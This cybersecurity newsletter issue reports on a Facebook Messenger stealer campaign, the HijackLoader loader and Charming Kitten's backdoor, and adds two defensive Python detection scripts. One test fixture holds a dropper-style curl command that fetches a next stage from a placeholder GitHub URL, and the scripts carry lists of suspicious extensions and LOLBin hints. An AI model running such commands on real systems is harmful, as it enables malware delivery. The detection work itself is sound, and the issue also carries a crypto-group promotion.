Facebook Messenger Phishing Attack Alert!

Sep 13 2023


Welcome to Gone Phishing, your daily cybersecurity newsletter that thinks cybercrime is Kim Jung Unacceptable 🙈 He's meeting with Putin! He's meeting with Putin! 💀💀💀

Todayโ€™s hottest cybersecurity news stories:

  • 👨‍💻 Facecrook: Vietnamese hackers unleash Python-based stealer via FB 🐍

  • ✈️ Introducing HijackLoader, the modular loader that everybody's talking about 🗣️

  • 🐈 This kitty's got claws. Charming Kitten is back using 'Sponsor' backdoor 🚪

Hackers: This is Vietnameasy lemon squeezy 🤦

📣 Facebook Messenger Phishing Attack Alert!

🚨 New Threat Alert:

A dangerous phishing campaign is making waves on Facebook Messenger, using a swarm of fake and hijacked personal accounts to target business accounts! 😱

🧐 The Details:

Researchers at Guardio Labs have uncovered this threat, which originates from a Vietnamese group tracked as MrTonyScam. The lure is a tiny compressed attachment that kicks off a multi-stage infection chain wrapped in layers of obfuscation.

📂 Victims receive enticing messages with RAR and ZIP archive attachments.

Opening the archive runs a dropper that fetches the next stage from GitHub or GitLab. That payload carries an obfuscated Python-based stealer that harvests saved login credentials and session cookies from web browsers.

🍪 Here's the kicker:

Once the cookies have been exfiltrated, the malware deletes them from the victim's machine, logging the victim out of their own accounts. The attackers then change the passwords and seize control!
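The chain above (tiny RAR/ZIP attachment, script or executable inside, next stage pulled from GitHub or GitLab) is something a mail gateway or SOC can triage mechanically. The script below is an added example written for this newsletter, not code from Guardio Labs' report or from the campaign itself. It only handles ZIP (RAR has no standard-library reader, so a real deployment would add one), and the lure archive, its member name and the GitHub URL are constructed placeholders for the demo.

```python
"""Triage a small archive attachment for the MrTonyScam-style lure.

Added example for this newsletter; it is not code from Guardio Labs'
report. It inspects a ZIP attachment in memory and scores the pattern
the campaign relies on: a tiny archive whose members are scripts or
executables (often behind a double extension) and whose content points
at GitHub or GitLab for the next stage. RAR is outside the standard
library, so a gateway deployment would add a RAR reader. The attachment
and its URL below are constructed for the demo.
"""
import io
import re
import zipfile

SCRIPT_EXTS = {".bat", ".cmd", ".vbs", ".js", ".jse", ".wsf", ".ps1", ".lnk", ".exe", ".scr", ".py"}
TINY_LIMIT = 100 * 1024          # the campaign's archives are only a few KB
MEMBER_READ_LIMIT = 1_000_000    # bound decompression per member (zip-bomb guard)
STAGE_HOST_RE = re.compile(
    rb"https?://(?:raw\.githubusercontent\.com|github\.com|gitlab\.com)/[^\s\"'<>]+", re.I)


def triage_zip(blob: bytes) -> dict:
    """Return members, next-stage URLs and the reasons the archive looks like a dropper."""
    members, urls, reasons = [], [], []
    with zipfile.ZipFile(io.BytesIO(blob)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            name = info.filename
            members.append(name)
            low = name.rsplit("/", 1)[-1].lower()
            ext = "." + low.rsplit(".", 1)[-1] if "." in low else ""
            if ext in SCRIPT_EXTS:
                reasons.append(f"script/executable member: {name}")
                if low.count(".") >= 2:
                    reasons.append(f"double extension: {name}")
            with zf.open(info) as member:       # bounded read, never trust declared sizes
                data = member.read(MEMBER_READ_LIMIT)
            urls.extend(m.decode("ascii", "replace") for m in STAGE_HOST_RE.findall(data))
    if urls:
        reasons.append(f"next stage hosted on code-hosting site: {', '.join(sorted(set(urls)))}")
    if reasons and len(blob) <= TINY_LIMIT:
        reasons.append(f"tiny archive ({len(blob)} bytes) carrying executable content")
    return {"members": members, "urls": urls, "reasons": reasons, "suspicious": bool(reasons)}


def build_sample_attachment() -> bytes:
    """Constructed lure: a small batch file that references a placeholder GitHub URL."""
    stage_url = b"https://raw.githubusercontent.com/example-org/example-repo/main/stage2.bin"  # placeholder
    bat = (b"@echo off\r\nrem constructed placeholder dropper for detection testing\r\n"
           b"curl -s -o %TEMP%\\st.bin " + stage_url + b"\r\n")
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("Photo_2023-09-12.jpg.bat", bat)
    return buf.getvalue()


def build_benign_attachment() -> bytes:
    """Constructed control: a plain text report, nothing to flag."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("report.txt", b"Quarterly numbers attached. Nothing to see here.")
    return buf.getvalue()


if __name__ == "__main__":
    for label, blob in (("lure", build_sample_attachment()), ("benign", build_benign_attachment())):
        verdict = triage_zip(blob)
        print(label, "SUSPICIOUS" if verdict["suspicious"] else "clean")
        for reason in verdict["reasons"]:
            print("  -", reason)
```

The reasons list is deliberately additive: a script member alone is a weak signal, but a script member plus a double extension plus a hard-coded code-hosting URL inside a few-kilobyte archive is the whole lure in one object, and that combination is what to alert on or quarantine.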

๐ŸŒ Global Impact:

While most attacks have hit the U.S., Australia, Canada, and more, no one is immune. Guardio Labs estimates 1 in 250 victims were infected in the last month.

๐Ÿ’ก Why Facebook?

Cybercriminals can monetize compromised Facebook accounts easily. They use them to spread scams and ads to a broad audience.

๐Ÿค Collaborative Threats:

This isn't the only recent Facebook threat. Experts note overlaps and connections among these threat actors, suggesting a coordinated effort or service-oriented cybercriminal ecosystem centred around social media platforms.

📢 Stay vigilant!

Educate yourself and your team to avoid falling prey to MrTonyScam and similar threats. Protect your business accounts, and report any suspicious activity.

I came across ZZZ money club during the crypto market bull run, when everyone's a winner. Even during the bear market, this Discord group has been amazing at giving information on projects and ways to make passive income in various ways.

The group is very active, and everyone in this private Discord group is very chatty and helpful.

It's run by Yourfriendandy and Decadeinvestor; you can find them here on YouTube, both top guys with great content.

If you are interested in joining the group, you can do so through the link below.

Jesus, you can't say HijackLoader on 9/11 (or the day after)!! #NeverForget 😭

🚨 HijackLoader, like Micah Richards, has burst onto the scene! 😳

🦠 The Threat:

A dangerous malware loader called HijackLoader is making waves in the cybercriminal world, delivering payloads such as DanaBot, SystemBC, and RedLine Stealer.

🤖 What Makes It Dangerous:

Despite its lack of advanced features, HijackLoader's modular architecture lets it swap in different modules for code injection and execution, a flexibility most loaders lack.

🕵️ Under the Radar:

The loader uses direct syscalls to evade monitoring by security products, checks running processes against an embedded blocklist of security tools, and delays execution at different stages by up to 40 seconds to avoid detection.

🔒 Persistence:

HijackLoader drops a shortcut (.lnk) file in the Windows Startup folder so it is relaunched at every logon on the compromised host.
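A Startup-folder shortcut is cheap to hunt for if you can read what the shortcut actually points at, since a .lnk whose target sits in AppData or Temp, or whose arguments invoke a LOLBin, is rarely legitimate. The script below is an added example written for this newsletter, not code from the HijackLoader analysis; it parses the Shell Link format with the standard library, and the sample shortcut, its path and its arguments are constructed test data. On a Windows host, `scan_startup_folders()` with no arguments reads the per-user and all-users Startup directories.

```python
"""Hunt Windows Startup folders for persistence shortcuts.

Added example for this newsletter; it is not code from the HijackLoader
write-up. It parses Shell Link (.lnk) files with the standard library
(MS-SHLLINK layout) and flags shortcuts whose target or arguments look
like malware persistence. The sample shortcut is constructed in memory
so the script runs on any OS; on a Windows host, scan_startup_folders()
reads the real Startup directories.
"""
import os
import struct
from pathlib import Path

# LinkFlags bits (MS-SHLLINK 2.1.1) and fixed header size
HAS_LINK_TARGET_ID_LIST, HAS_LINK_INFO, HAS_NAME = 0x01, 0x02, 0x04
HAS_RELATIVE_PATH, HAS_WORKING_DIR, HAS_ARGUMENTS, IS_UNICODE = 0x08, 0x10, 0x20, 0x80
HEADER_SIZE = 0x4C
LINK_CLSID = bytes.fromhex("0114020000000000c000000000000046")

# Directories an unprivileged user can write to: odd homes for a Startup target
USER_WRITABLE = ("\\appdata\\", "\\temp\\", "\\downloads\\", "\\public\\", "\\programdata\\")
LOLBIN_HINTS = ("powershell", "-enc", "rundll32", "regsvr32", "mshta", "wscript", "cscript")


def parse_lnk(data: bytes) -> dict:
    """Extract the local target path and StringData fields from a .lnk blob."""
    if len(data) < HEADER_SIZE or struct.unpack_from("<I", data, 0)[0] != HEADER_SIZE:
        raise ValueError("not a Shell Link file")
    flags = struct.unpack_from("<I", data, 0x14)[0]
    pos = HEADER_SIZE
    if flags & HAS_LINK_TARGET_ID_LIST:          # skip the PIDL, we only want paths
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    target = None
    if flags & HAS_LINK_INFO:                    # offsets inside LinkInfo are relative to its start
        info_size = struct.unpack_from("<I", data, pos)[0]
        local_base_off = struct.unpack_from("<I", data, pos + 16)[0]
        if local_base_off:
            start = pos + local_base_off
            target = data[start:data.index(b"\x00", start)].decode("cp1252", "replace")
        pos += info_size

    def read_string() -> str:
        nonlocal pos
        count = struct.unpack_from("<H", data, pos)[0]
        pos += 2
        width = 2 if flags & IS_UNICODE else 1
        raw = data[pos:pos + count * width]
        pos += count * width
        return raw.decode("utf-16-le" if width == 2 else "cp1252", "replace")

    link = {"target": target}
    for bit, key in ((HAS_NAME, "name"), (HAS_RELATIVE_PATH, "relative_path"),
                     (HAS_WORKING_DIR, "working_dir"), (HAS_ARGUMENTS, "arguments")):
        link[key] = read_string() if flags & bit else None
    return link


def is_suspicious(link: dict) -> bool:
    """Flag targets in user-writable paths or LOLBin-style command lines."""
    target = (link["target"] or link["relative_path"] or "").lower()
    args = (link["arguments"] or "").lower()
    return any(d in target for d in USER_WRITABLE) or any(h in args for h in LOLBIN_HINTS)


def scan_startup_folders(folders=None) -> list:
    """Return (path, parsed link) for every suspicious .lnk in the Startup folders."""
    if folders is None:  # per-user and all-users Startup locations on Windows
        folders = [Path(os.environ.get("APPDATA", "")) / "Microsoft/Windows/Start Menu/Programs/Startup",
                   Path(os.environ.get("PROGRAMDATA", "")) / "Microsoft/Windows/Start Menu/Programs/StartUp"]
    findings = []
    for folder in map(Path, folders):
        if not folder.is_dir():
            continue
        for lnk in folder.glob("*.lnk"):
            try:
                link = parse_lnk(lnk.read_bytes())
            except ValueError:
                continue
            if is_suspicious(link):
                findings.append((str(lnk), link))
    return findings


def build_sample_lnk(target: str, args: str = "") -> bytes:
    """Constructed test data: a minimal .lnk with a LinkInfo local path and arguments."""
    flags = HAS_LINK_INFO | HAS_ARGUMENTS | IS_UNICODE
    header = struct.pack("<I16sIIQQQIIIHH8s", HEADER_SIZE, LINK_CLSID, flags,
                         0x20, 0, 0, 0, 0, 0, 1, 0, 0, b"\x00" * 8)
    volume_id = struct.pack("<IIII", 0x11, 3, 0, 0x10) + b"\x00"   # DRIVE_FIXED, empty label
    base = target.encode("cp1252") + b"\x00"
    vol_off = 0x1C
    base_off = vol_off + len(volume_id)
    suffix_off = base_off + len(base)
    link_info = struct.pack("<IIIIIII", suffix_off + 1, 0x1C, 1, vol_off, base_off, 0, suffix_off)
    link_info += volume_id + base + b"\x00"
    return header + link_info + struct.pack("<H", len(args)) + args.encode("utf-16-le")


if __name__ == "__main__":
    sample = parse_lnk(build_sample_lnk(r"C:\Users\alice\AppData\Roaming\updater.exe", "-silent"))
    print(sample, "suspicious" if is_suspicious(sample) else "clean")
    for path, link in scan_startup_folders():
        print("SUSPICIOUS", path, link["target"], link["arguments"])
```

The parser reads the LinkInfo local base path rather than trusting the friendly name or icon, because those are exactly the fields a loader dresses up to look like a vendor updater; the heuristic in `is_suspicious` is intentionally simple and is where you would plug in your own allow-list of known-good Startup entries.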

👎 Quality Concerns:

While it's a modular loader with evasion techniques, experts note the code quality is poor.

๐ŸŒ Evolving Threat Landscape:

In addition to HijackLoader, there's a rising trend of information-stealing malware like RisePro, which promises more control for users. A new Node.js-based stealer, distributed via fake Facebook ads, is also targeting Chromium-based browsers.

๐Ÿ” Implications:

These developments show the ever-evolving cybercrime landscape, with stealers being a common initial attack vector for threat actors. This highlights the importance of robust cybersecurity measures.

๐Ÿ›ก๏ธ Stay Protected:

Keep your systems updated, use reputable security software, and educate your team to recognize and avoid suspicious content. Be vigilant in this constantly changing threat environment!

๐Ÿ—ž๏ธ Extra, Extra! Read all about it! ๐Ÿ—ž๏ธ

Every few weeks, we carefully select three hot newsletters to show you. Reputation is everything, so any links we share come from personal recommendation or carefully researched businesses at the time of posting. Enjoy!

  • ✈️ ViaTravelers: Get exclusive travel tips, news, and insider deals right in your inbox.

  • 🌍 Leadership in Tech: A weekly newsletter for CTOs, engineering managers and senior engineers to become better leaders.

  • 🧠 Big Brain: Trending AI news, jobs and tools delivered in 3 minutes per day.

Let us know what you think!

Charming Kitten goes 'Ballistic', U.A.E. atrocious 😬

🌍 Charming Kitten Strikes Again! 😺

🔍 The Threat:

The Iranian cyber threat group Charming Kitten is back in action, targeting entities in Brazil, Israel, and the U.A.E. Their weapon of choice? A previously undocumented backdoor called "Sponsor."

🦠 Code Name:

The group is tracked by Slovak cybersecurity firm ESET as "Ballistic Bobcat", and ESET calls this campaign "Sponsoring Access." Its targets primarily include education, government, and healthcare organisations, as well as human rights activists and journalists.

🎯 Victims Detected:

So far, at least 34 victims have been identified, with the attacks dating back to September 2021.

💼 How It Works:

Sponsor reads its configuration from files on disk; these are dropped discreetly by batch files and deliberately built to look innocuous so they evade detection. The attackers gain initial access by exploiting known vulnerabilities in internet-exposed Microsoft Exchange servers.

🌍 Global Reach:

This campaign is not limited by borders. It has affected organisations in multiple countries and overlaps with the Iranian activity described in a November 2021 joint advisory from Australia, the U.K., and the U.S.

🛡️ Stay Safe:

Cybersecurity is crucial. Keep your systems updated, patch known vulnerabilities, and educate your team to recognize potential threats.

Charming Kitten's tactics may evolve, but with vigilance, you can protect your organisation!

So long and thanks for reading all the phish!
